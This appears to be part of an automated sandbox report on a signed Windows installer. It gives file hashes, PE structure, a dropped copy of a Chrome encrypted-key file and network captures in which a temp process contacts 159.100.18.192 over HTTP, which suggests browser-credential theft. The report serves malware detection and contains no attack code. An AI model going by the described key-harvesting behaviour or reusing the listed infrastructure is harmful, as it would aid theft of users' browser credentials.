                                                                                                                                                                      SHA-256:09BD2149BA8A503349FE7C29BF664B2490DF1706CAF4520626C6CE6FF99A6D7E
                                                                                                                                                                      SHA-512:FAAD5ABB6C8ACA08B78A18D327EC8D9D56AC97F2A539E7B391A56BCFB48E74261D38EDB3A049547CDCD670105DF213C24612282B758E110B685C757138447C8E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb5qmeJUkGQpm40V/wrURqAAAAAAIAAAAAABBmAAAAAQAAIAAAAG4UhC6U9tNd/7wzsqZcS9KdclPCVP+u+KfkZq5Bk+jFAAAAAA6AAAAAAgAAIAAAABDTCZOv5pa4Jw+idLlPRpLEwRzjWEjhnE2Ko9wq4h1KMAAAAIJwcrBuRt0GuFCKX3iuIKe9oA8HHFs7v9sl24eRV2Wkint5h4TmB5ooO++HXhsH2EAAAAAJdLq76rmCsd60NIL0OvC8g5EXqL1u546TvG3kCd/4PfO1pwIqU33MhLZKZcCs6Y8f0L2m8ZnjDXf578P1XHVl"}}

                                                                                                                                                                      C:\Users\user\AppData\Roaming\hgekorcpiasneymc\a6ebfa85-e3e0-4d29-9136-fdc1bc388182.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):389
                                                                                                                                                                      Entropy (8bit):5.622621949828896
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YKWSg99rrt+f70OAzkP/tXiPLVayaHWRnGX1:YKWfrrtozAzgSPLVayaHW5A
                                                                                                                                                                      MD5:C5A13312836B5591B4FDD0F18FB17873
                                                                                                                                                                      SHA1:E103F6BD20DA9F30C4064F55F1AF9B5192B815BD
                                                                                                                                                                      SHA-256:09BD2149BA8A503349FE7C29BF664B2490DF1706CAF4520626C6CE6FF99A6D7E
                                                                                                                                                                      SHA-512:FAAD5ABB6C8ACA08B78A18D327EC8D9D56AC97F2A539E7B391A56BCFB48E74261D38EDB3A049547CDCD670105DF213C24612282B758E110B685C757138447C8E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb5qmeJUkGQpm40V/wrURqAAAAAAIAAAAAABBmAAAAAQAAIAAAAG4UhC6U9tNd/7wzsqZcS9KdclPCVP+u+KfkZq5Bk+jFAAAAAA6AAAAAAgAAIAAAABDTCZOv5pa4Jw+idLlPRpLEwRzjWEjhnE2Ko9wq4h1KMAAAAIJwcrBuRt0GuFCKX3iuIKe9oA8HHFs7v9sl24eRV2Wkint5h4TmB5ooO++HXhsH2EAAAAAJdLq76rmCsd60NIL0OvC8g5EXqL1u546TvG3kCd/4PfO1pwIqU33MhLZKZcCs6Y8f0L2m8ZnjDXf578P1XHVl"}}

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                      Entropy (8bit):7.999986475754448
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:AyqwnIUrcz.exe
                                                                                                                                                                      File size:64'824'672 bytes
                                                                                                                                                                      MD5:1e047b85b671cc99d941c13865f069db
                                                                                                                                                                      SHA1:7e23e9ffbdfd30537546385e5cd475f58b06e7ae
                                                                                                                                                                      SHA256:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45
                                                                                                                                                                      SHA512:bcf450b9fb274698a174424511ff6cb8dc4a656e0d0cbe8dd15084cc253d07dc8a6d65169d86a0f9e11dede8f89b7031241cf7b5dfc3b9d92e7bc2dc123e327a
                                                                                                                                                                      SSDEEP:1572864:Fjdd/VTld+qlxzJ3LXkQ/eCsYlATxy5YUtrxWNA:9/xldB/zJ7P/bsFTxy5YUtrQNA
                                                                                                                                                                      TLSH:4FE733BE958C38DAD24BFFF15092E2F8C2E4682717D8856017C6161F71F3A911DEA632
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:072b9152b6f16913

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x40338f
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:4
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                      Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                      Error Number:0
                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                      • 03/12/2024 04:22:54 30/08/2025 08:25:00
                                                                                                                                                                      Subject Chain
                                                                                                                                                                      • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=ConsolHQ LTD, SERIALNUMBER=12800651, O=ConsolHQ LTD, L=Erith, C=GB
                                                                                                                                                                      Version:3
                                                                                                                                                                      Thumbprint MD5:AE4739734663D1493610E29B49A5FD6A
                                                                                                                                                                      Thumbprint SHA-1:07728484B1BB8702A87C6E5A154E0D690AF2FF38
                                                                                                                                                                      Thumbprint SHA-256:DA16DE049B8D8C0C1BE2A4AE6B31629AD9530FD1CF1FEF83EEE59F32C6457DF6
                                                                                                                                                                      Serial:30D6C83A715BDDB32E7956FE52D6B352

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      push 00000020h
                                                                                                                                                                      pop edi
                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                      push 00008001h
                                                                                                                                                                      mov dword ptr [esp+14h], ebx
                                                                                                                                                                      mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                      call dword ptr [004080A8h]
                                                                                                                                                                      call dword ptr [004080A4h]
                                                                                                                                                                      and eax, BFFFFFFFh
                                                                                                                                                                      cmp ax, 00000006h
                                                                                                                                                                      mov dword ptr [0047AEECh], eax
                                                                                                                                                                      je 00007FFBF4506FA3h
                                                                                                                                                                      push ebx
                                                                                                                                                                      call 00007FFBF450A255h
                                                                                                                                                                      cmp eax, ebx
                                                                                                                                                                      je 00007FFBF4506F99h
                                                                                                                                                                      push 00000C00h
                                                                                                                                                                      call eax
                                                                                                                                                                      mov esi, 004082B0h
                                                                                                                                                                      push esi
                                                                                                                                                                      call 00007FFBF450A1CFh
                                                                                                                                                                      push esi
                                                                                                                                                                      call dword ptr [00408150h]
                                                                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                      cmp byte ptr [esi], 00000000h
                                                                                                                                                                      jne 00007FFBF4506F7Ch
                                                                                                                                                                      push 0000000Ah
                                                                                                                                                                      call 00007FFBF450A228h
                                                                                                                                                                      push 00000008h
                                                                                                                                                                      call 00007FFBF450A221h
                                                                                                                                                                      push 00000006h
                                                                                                                                                                      mov dword ptr [0047AEE4h], eax
                                                                                                                                                                      call 00007FFBF450A215h
                                                                                                                                                                      cmp eax, ebx
                                                                                                                                                                      je 00007FFBF4506FA1h
                                                                                                                                                                      push 0000001Eh
                                                                                                                                                                      call eax
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      je 00007FFBF4506F99h
                                                                                                                                                                      or byte ptr [0047AEEFh], 00000040h
                                                                                                                                                                      push ebp
                                                                                                                                                                      call dword ptr [00408044h]
                                                                                                                                                                      push ebx
                                                                                                                                                                      call dword ptr [004082A0h]
                                                                                                                                                                      mov dword ptr [0047AFB8h], eax
                                                                                                                                                                      push ebx
                                                                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                                                                      push 000002B4h
                                                                                                                                                                      push eax
                                                                                                                                                                      push ebx
                                                                                                                                                                      push 00440208h
                                                                                                                                                                      call dword ptr [00408188h]
                                                                                                                                                                      push 0040A2C8h

                                                                                                                                                                      Rich Headers

                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x10b0000x2ca0.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x3dcff280x2638
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x66270x68007618d4c0cd8bb67ea9595b4266b3a91fFalse0.6646259014423077data6.450282348506287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0xa0000x70ff80x600db8f31a08a2242d80c29e1f9500c6527False0.5182291666666666data4.037117731448378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .ndata0x7b0000x900000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x10b0000x2ca00x2e00ef641b158db5997934c553d65bc16d31False0.8669327445652174data7.41349647251161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_ICON0x10b1d80x22d1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9978682822843038
                                                                                                                                                                      RT_DIALOG0x10d4b00x100dataEnglishUnited States0.5234375
                                                                                                                                                                      RT_DIALOG0x10d5b00xf8dataEnglishUnited States0.6330645161290323
                                                                                                                                                                      RT_DIALOG0x10d6a80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                      RT_GROUP_ICON0x10d7080x14dataEnglishUnited States1.05
                                                                                                                                                                      RT_VERSION0x10d7200x240dataEnglishUnited States0.5017361111111112
                                                                                                                                                                      RT_MANIFEST0x10d9600x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                      USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                      SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                                      ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                      Possible Origin

                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 13, 2024 14:46:58.593765974 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:46:58.593813896 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:46:58.593899012 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:46:58.594647884 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:46:58.594661951 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:00.284683943 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:00.287830114 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:00.287859917 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:00.288954973 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:00.289653063 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:00.292489052 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:00.292571068 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:00.333117008 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:00.333134890 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:00.380206108 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.360830069 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.360891104 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.360934019 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.360933065 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.360963106 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.361001015 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.361006975 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.373778105 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.373841047 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.373866081 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.380351067 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.380403042 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.380410910 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.387177944 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.387227058 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.387245893 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.427547932 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.427587032 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.547815084 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.547883987 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.547924042 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.553867102 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.553924084 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.553941011 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567367077 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567413092 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567461967 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.567488909 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567555904 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.569108009 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.569307089 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.569346905 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.569389105 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:02.393925905 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:02.393959045 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:15.280419111 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:15.280462027 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:15.280519009 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:15.281048059 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:15.281059980 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.087255955 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.087299109 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.087431908 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.088417053 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.088430882 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.496361017 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.513087034 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.513108015 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.514288902 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.514394999 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.517282963 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.517364025 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.517754078 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.517760992 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.676961899 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.926920891 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.927006006 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.927082062 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.927891970 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.927911043 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.304563999 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.361824036 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.361839056 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.363035917 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.363049030 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.363118887 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.376578093 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.376714945 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.377310038 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.377319098 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.473807096 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.578713894 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.578836918 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.578980923 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:41.502110958 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:41.623476028 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:41.624752045 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:41.625247002 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:41.745034933 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:42.893603086 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:42.893758059 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:42.893863916 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:42.900346994 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:43.020098925 CET8049867159.100.18.192192.168.2.7

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 13, 2024 14:46:58.451510906 CET5612453192.168.2.71.1.1.1
                                                                                                                                                                      Dec 13, 2024 14:46:58.589478016 CET53561241.1.1.1192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:15.101226091 CET5637953192.168.2.71.1.1.1
                                                                                                                                                                      Dec 13, 2024 14:47:15.101682901 CET5033453192.168.2.71.1.1.1
                                                                                                                                                                      Dec 13, 2024 14:47:15.238285065 CET53563791.1.1.1192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:15.239532948 CET53503341.1.1.1192.168.2.7

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 13, 2024 14:46:58.451510906 CET192.168.2.71.1.1.10xf8fdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 13, 2024 14:47:15.101226091 CET192.168.2.71.1.1.10x6cf6Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 13, 2024 14:47:15.101682901 CET192.168.2.71.1.1.10x2d58Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 13, 2024 14:46:58.589478016 CET1.1.1.1192.168.2.70xf8fdNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 13, 2024 14:47:15.238285065 CET1.1.1.1192.168.2.70x6cf6No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 13, 2024 14:47:15.238285065 CET1.1.1.1192.168.2.70x6cf6No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 13, 2024 14:47:15.239532948 CET1.1.1.1192.168.2.70x2d58No error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • www.google.com
                                                                                                                                                                      • chrome.cloudflare-dns.com
                                                                                                                                                                      • 159.100.18.192

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.749867159.100.18.192801964C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
